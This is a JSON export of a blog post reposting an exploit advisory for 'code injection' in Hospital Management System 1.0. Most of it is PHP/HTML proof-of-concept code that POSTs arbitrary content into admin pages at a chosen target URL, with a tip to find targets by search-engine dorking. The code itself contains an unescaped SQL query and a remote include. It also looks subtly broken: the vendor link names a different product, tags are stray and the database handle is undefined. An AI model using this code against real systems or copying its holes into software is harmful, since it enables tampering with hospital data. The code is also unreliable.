{"id":59027,"date":"2024-08-20T19:41:07","date_gmt":"2024-08-20T16:41:07","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180246\/hms10-exec.txt"},"modified":"2024-08-20T19:41:07","modified_gmt":"2024-08-20T16:41:07","slug":"hospital-management-system-1-0-code-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/hospital-management-system-1-0-code-injection\/","title":{"rendered":"Hospital Management System 1.0 Code Injection"},"content":{"rendered":"

=============================================================================================================================================
| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https:\/\/phpgurukul.com\/wp-content\/uploads\/2017\/12\/Hostel-Management-Syste-Updated-Code.zip |
=============================================================================================================================================<\/p>\n

poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] Part 01 : about-us.php<\/p>\n[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file \/hms\/admin\/about-us.php . <\/p>\n[+] Line 2 : Make sure to include your database connection here<\/p>\n[+] Line 44 : Send the form data using fetch API (Set your target url)<\/p>\n[+] save payload as poc.php in your localhost path .<\/p>\n[+] payload : <\/p>\n

<?php
include(‘http:\/\/127.0.0.1\/hospital\/hms\/admin\/include\/config.php’); \/\/ Make sure to include your database connection here<\/p>\n

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$query = mysqli_query($con, “UPDATE tblpage SET PageTitle=’$pagetitle’, PageDescription=’$pagedes’ WHERE PageType=’aboutus'”);<\/p>\n

if ($query) {
echo ‘<script>alert(“About Us has been updated.”)<\/script>’;
} else {
echo ‘<script>alert(“Something Went Wrong. Please try again.”)<\/script>’;
}
exit;
}
?><\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>indoushka | Update About Us Content<\/title>
<!– NicEdit Script –>
<script src=”http:\/\/js.nicedit.com\/nicEdit-latest.js” type=”text\/javascript”><\/script>
<script type=”text\/javascript”>
\/\/ Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);<\/p>\n

\/\/ Function to handle form submission using JavaScript
function submitForm(event) {
event.preventDefault(); \/\/ Prevent default form submission<\/p>\n

const pagetitle = document.getElementById(‘pagetitle’).value;
const pagedes = nicEditors.findEditor(‘pagedes’).getContent(); \/\/ Get the NicEdit content<\/p>\n

\/\/ Prepare the form data to be sent
const formData = new FormData();
formData.append(‘pagetitle’, pagetitle);
formData.append(‘pagedes’, pagedes);
formData.append(‘submit’, true);<\/p>\n

\/\/ Send the form data using fetch API
fetch(‘http:\/\/127.0.0.1\/hospital\/hms\/admin\/about-us.php’, {
method: ‘POST’,
body: formData,
})
.then(response => response.text())
.then(data => {
alert(‘About Us content has been updated successfully.’);
console.log(data); \/\/ Handle the response from the server
})
.catch(error => {
console.error(‘Error:’, error);
});
}
<\/script>
<style>
\/* Center the form container *\/
.editor-container {
max-width: 800px;
margin: 0 auto; \/* Center horizontally *\/
padding: 20px;
text-align: center; \/* Center the content inside *\/
}<\/p>\n

\/* Ensure the textarea takes the full width *\/
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
<\/style>
<\/head>
<body>
<div id=”app”>
<div class=”app-content”>
<div class=”main-content”>
<div class=”wrap-content container” id=”container”>
<!– Page Title Section –>
<section id=”page-title”>
<div class=”row”>
<div class=”col-sm-8″>
<h1 class=”mainTitle”>Update the About Us Content<\/h1>
<\/div><\/p>\n

<\/li>
<\/ol>
<\/div>
<\/section>
<!– Form Section –>
<div class=”container-fluid container-fullw bg-white”>
<div class=”row”>
<div class=”col-md-12″>
<!– Centering the form using a wrapper div –>
<div class=”editor-container”>
<form class=”forms-sample” method=”post” onsubmit=”submitForm(event);”>
<div class=”form-group”>
<label for=”pagetitle”>Page Title<\/label>
<input id=”pagetitle” name=”pagetitle” type=”text” class=”form-control” required>
<\/div>
<div class=”form-group”>
<label for=”pagedes”>Page Description<\/label>
<!– NicEdit will enhance this textarea –>
<textarea class=”form-control” name=”pagedes” id=”pagedes” rows=”12″><\/textarea>
<\/div>
<button type=”submit” class=”btn btn-primary mr-2″ name=”submit”>Submit<\/button>
<\/form>
<\/div>
<\/div>
<\/div>
<\/div>
<!– End Form Section –>
<\/div>
<\/div>
<\/div>
<\/div>
<!– Footer –>
<\/body>
<\/html><\/p>\n

———————- [+] Part 02 : contact.php [+] ——————–<\/p>\n[+] Line 4 : Make sure to include your database connection here<\/p>\n[+] Line 60 : Send the form data using fetch API (Set your target url)<\/p>\n[+] save payload as poc.php in your localhost path .<\/p>\n[+] payload : <\/p>\n

<?php<\/p>\n

\/\/ \u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u062e\u0627\u062f\u0645 \u0627\u0644\u062e\u0627\u0631\u062c\u064a
$url = ‘http:\/\/127.0.0.1\/hospital\/hms\/admin\/include\/config.php’;<\/p>\n

\/\/ \u062c\u0644\u0628 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0627\u0644\u062e\u0627\u062f\u0645 \u0627\u0644\u062e\u0627\u0631\u062c\u064a
$response = file_get_contents($url);<\/p>\n

\/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a
if ($response !== FALSE) {
\/\/ \u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a
echo $response;
} else {
echo ‘\u062d\u062f\u062b \u062e\u0637\u0623 \u0623\u062b\u0646\u0627\u0621 \u062c\u0644\u0628 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a.’;
}<\/p>\n

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$email = $con->real_escape_string($_POST[’email’]);
$mobnum = $con->real_escape_string($_POST[‘mobnum’]);<\/p>\n

$query = mysqli_query($con, “UPDATE tblpage SET PageTitle=’$pagetitle’, PageDescription=’$pagedes’, Email=’$email’, MobileNumber=’$mobnum’ WHERE PageType=’contactus'”);<\/p>\n

if ($query) {
echo ‘<script>alert(“Contact Us has been updated.”)<\/script>’;
} else {
echo ‘<script>alert(“Something Went Wrong. Please try again.”)<\/script>’;
}
exit;
}<\/p>\n

?>
<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>Admin | Update Contact Us Content<\/title>
<!– NicEdit Script –>
<script src=”http:\/\/js.nicedit.com\/nicEdit-latest.js” type=”text\/javascript”><\/script>
<script type=”text\/javascript”>
bkLib.onDomLoaded(nicEditors.allTextAreas);<\/p>\n

function submitForm(event) {
event.preventDefault();<\/p>\n

const pagetitle = document.getElementById(‘pagetitle’).value;
const pagedes = nicEditors.findEditor(‘pagedes’).getContent();
const email = document.getElementById(’email’).value;
const mobnum = document.getElementById(‘mobnum’).value;<\/p>\n

const formData = new FormData();
formData.append(‘pagetitle’, pagetitle);
formData.append(‘pagedes’, pagedes);
formData.append(’email’, email);
formData.append(‘mobnum’, mobnum);
formData.append(‘submit’, true);<\/p>\n

fetch(‘http:\/\/127.0.0.1\/hospital\/hms\/admin\/contact.php’, {
method: ‘POST’,
body: formData,
})
.then(response => response.text())
.then(data => {
alert(‘Contact Us content has been updated successfully.’);
console.log(data);
})
.catch(error => {
console.error(‘Error:’, error);
});
}
<\/script>
<style>
.editor-container {
max-width: 800px;
margin: 0 auto;
padding: 20px;
text-align: center;
}<\/p>\n

#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
<\/style>
<\/head>
<body>
<div id=”app”>
<div class=”app-content”>
<div class=”main-content”>
<div class=”wrap-content container” id=”container”>
<section id=”page-title”>
<div class=”row”>
<div class=”col-sm-8″>
<h1 class=”mainTitle”>Admin | Update Contact Us Content<\/h1>
<\/div>
<ol class=”breadcrumb”>
<li class=”active”>
<span>Update Contact Us Content<\/span>
<\/li>
<\/ol>
<\/div>
<\/section>
<div class=”container-fluid container-fullw bg-white”>
<div class=”row”>
<div class=”col-md-12″>
<div class=”editor-container”>
<form class=”forms-sample” method=”post” onsubmit=”submitForm(event);”>
<div class=”form-group”>
<label for=”pagetitle”>Page Title<\/label>
<input id=”pagetitle” name=”pagetitle” type=”text” class=”form-control” required>
<\/div>
<div class=”form-group”>
<label for=”pagedes”>Page Description<\/label>
<textarea class=”form-control” name=”pagedes” id=”pagedes” rows=”12″><\/textarea>
<\/div>
<div class=”form-group”>
<label for=”email”>Email<\/label>
<input id=”email” name=”email” type=”email” class=”form-control” required>
<\/div>
<div class=”form-group”>
<label for=”mobnum”>Mobile Number<\/label>
<input id=”mobnum” name=”mobnum” type=”text” class=”form-control” required>
<\/div>
<button type=”submit” class=”btn btn-primary mr-2″ name=”submit”>Submit<\/button>
<\/form>
<\/div>
<\/div>
<\/div>
<\/div>
<\/div>
<\/div>
<\/div>
<\/div>
<\/body>
<\/html><\/p>\n

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

=============================================================================================================================================| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/phpgurukul.com\/wp-content\/uploads\/2017\/12\/Hostel-Management-Syste-Updated-Code.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] Part 01 : about-us.php [+] This …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59027","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59027"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59027\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59027"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59027"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}